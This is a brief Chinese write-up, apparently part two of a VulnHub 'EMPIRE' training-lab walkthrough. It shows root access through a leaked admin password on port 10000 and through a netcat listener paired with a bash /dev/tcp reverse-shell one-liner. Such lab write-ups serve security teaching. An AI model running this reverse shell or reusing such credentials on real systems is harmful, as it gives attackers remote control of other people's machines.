vulnhub靶场之EMPIRE( 二 )


vulnhub靶场之EMPIRE

文章插图
到这里的话有两种方式,第一种:在10000端口采用:admin/Ts&4&YurgtRX(=~h,进行登录,进入后可直接获得root账户权限 。
vulnhub靶场之EMPIRE

文章插图
第二种:反弹一个shell,在kali中开启对8899端口的监听,命令:nc -lvvp 8899,然后在靶机中执行bash命令:bash -c 'bash -i >& /dev/tcp/192.168.1.12/8899 0>&1' 。
vulnhub靶场之EMPIRE

文章插图
在反弹的shell中切换root用户并查看root下的文件信息,成功获得第二个flag 。
vulnhub靶场之EMPIRE

文章插图
【vulnhub靶场之EMPIRE】

经验总结扩展阅读